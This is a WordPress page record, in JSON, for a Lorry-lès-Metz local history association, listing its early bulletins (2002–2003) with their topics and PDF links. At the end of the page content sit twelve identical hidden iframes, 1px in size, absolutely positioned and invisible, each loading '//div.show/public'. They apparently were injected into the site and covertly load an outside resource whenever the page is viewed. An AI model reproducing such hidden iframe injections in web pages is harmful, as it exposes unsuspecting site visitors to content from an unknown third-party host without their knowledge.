{"id":8807,"date":"2026-01-11T18:59:42","date_gmt":"2026-01-11T17:59:42","guid":{"rendered":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=8807"},"modified":"2026-04-15T08:34:06","modified_gmt":"2026-04-15T06:34:06","slug":"les-bulletins","status":"publish","type":"page","link":"http:\/\/lorrylesmetz-histoire.fr\/?page_id=8807","title":{"rendered":"Les <em>Bulletins<\/em>"},"content":{"rendered":"<p>Les anciens num\u00e9ros du <em>bulletin<\/em> sont disponibles gratuitement.<\/p>\n<p>&nbsp;<\/p>\n<table style=\"border-collapse: collapse; width: 91.3761%; height: 212px;\">\n<tbody>\n<tr>\n<td style=\"width: 57.2239%;\"><strong>Num\u00e9ro 0 \u2013 mai 2002<\/strong><\/p>\n<p>Ce document est en quelque sorte le Bulletin o, il annonce la cr\u00e9ation de l&rsquo;association et il est distribu\u00e9 dans tous les foyers du village.<\/td>\n<td style=\"width: 42.7761%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2026\/01\/Bulletin-0.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=8820\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 57.2239%;\"><strong>Num\u00e9ro\u00a01 \u2013 d\u00e9cembre\u00a02002<br \/>\n<\/strong><\/p>\n<ul>\n<li>Journ\u00e9es du patrimoine<\/li>\n<li>La vie scolaire \u00e0 Lorry-l\u00e8s-Metz<\/li>\n<li>Les pages info<\/li>\n<\/ul>\n<p><strong>\u00a0<\/strong><\/td>\n<td style=\"width: 42.7761%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2026\/02\/Bulletin-01.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-683 size-full\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png?_t=1771347008\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=8837\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 57.2239%;\"><strong>Num\u00e9ro\u00a02 \u2013 juin\u00a02003<br \/>\n<\/strong><\/p>\n<ul>\n<li>Les vitraux d\u2019Arthur\u00a0Schouler<\/li>\n<li>Le vitrail<\/li>\n<li>Les anciens vitraux<\/li>\n<li>La r\u00e9alisation des vitraux<\/li>\n<li>Arthur\u00a0Schouler<\/li>\n<li>L\u2019abb\u00e9 \u00c9mile\u00a0Jacquemin<\/li>\n<li>Les vitraux de 1954<\/li>\n<li>Quatre portraits<\/li>\n<li>Les vitraux de 1956<\/li>\n<li>L\u2019abb\u00e9 Victor\u00a0Leitner<\/li>\n<li>La restauration de l\u2019\u00e9glise en 1979<\/li>\n<li>L\u2019abb\u00e9 \u00c9tienne\u00a0Nicolas<\/li>\n<li>Le vitrail pos\u00e9 en 1979<\/li>\n<li>\u00c9glises poss\u00e9dant des vitraux d\u2019Arthur\u00a0Schouler<\/li>\n<li>Planche en couleurs des vitraux (hors bulletin)<\/li>\n<\/ul>\n<\/td>\n<td style=\"width: 42.7761%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2026\/03\/Bulletin-02.pdf\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=8854\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a>\n<p>&nbsp;<\/p>\n<p>Planche en couleurs des vitraux :<\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2026\/03\/Bulletin-02-Encart-couleur.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=8856\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a>\n<p>&nbsp;<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 57.2239%;\"><strong>Num\u00e9ro\u00a03 \u2013 d\u00e9cembre\u00a02003<br \/>\n<\/strong><\/p>\n<ul>\n<li>Info, page\u00a02<\/li>\n<li>Tour clocher de Lorry-l\u00e8s-Metz, page\u00a03<\/li>\n<li>Petites histoires de Lorry-l\u00e8s-Metz, page\u00a07<\/li>\n<\/ul>\n<\/td>\n<td style=\"width: 42.7761%;\"><a href=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2026\/04\/Bulletin-03.pdf\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-683\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/voir.png\" alt=\"\" width=\"89\" height=\"31\" \/><\/a><\/p>\n<p><a href=\"http:\/\/lorrylesmetz-histoire.fr\/?media_dl=9251\"><img decoding=\"async\" src=\"http:\/\/lorrylesmetz-histoire.fr\/wp-content\/uploads\/2017\/05\/telecharger_pdf.png\" \/><\/a><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><span style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" data-mce-type=\"bookmark\" class=\"mce_SELRES_start\">\ufeff<\/span><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n<div><iframe style=\"position: absolute; height: 1px,width:1px; top: 0; left: 0; border: none; visibility: hidden;\" src=\"\/\/div.show\/public\"><\/iframe><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Les anciens num\u00e9ros du bulletin sont disponibles gratuitement. &nbsp; Num\u00e9ro 0 \u2013 mai 2002 Ce document est en quelque sorte le Bulletin o, il annonce la cr\u00e9ation de l&rsquo;association et il est distribu\u00e9 dans tous les foyers du village. Num\u00e9ro\u00a01&hellip; <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":159,"menu_order":4,"comment_status":"closed","ping_status":"closed","template":"","meta":{"_mc_calendar":[],"footnotes":""},"class_list":["post-8807","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/8807","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8807"}],"version-history":[{"count":10,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/8807\/revisions"}],"predecessor-version":[{"id":9252,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/8807\/revisions\/9252"}],"up":[{"embeddable":true,"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=\/wp\/v2\/pages\/159"}],"wp:attachment":[{"href":"http:\/\/lorrylesmetz-histoire.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8807"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}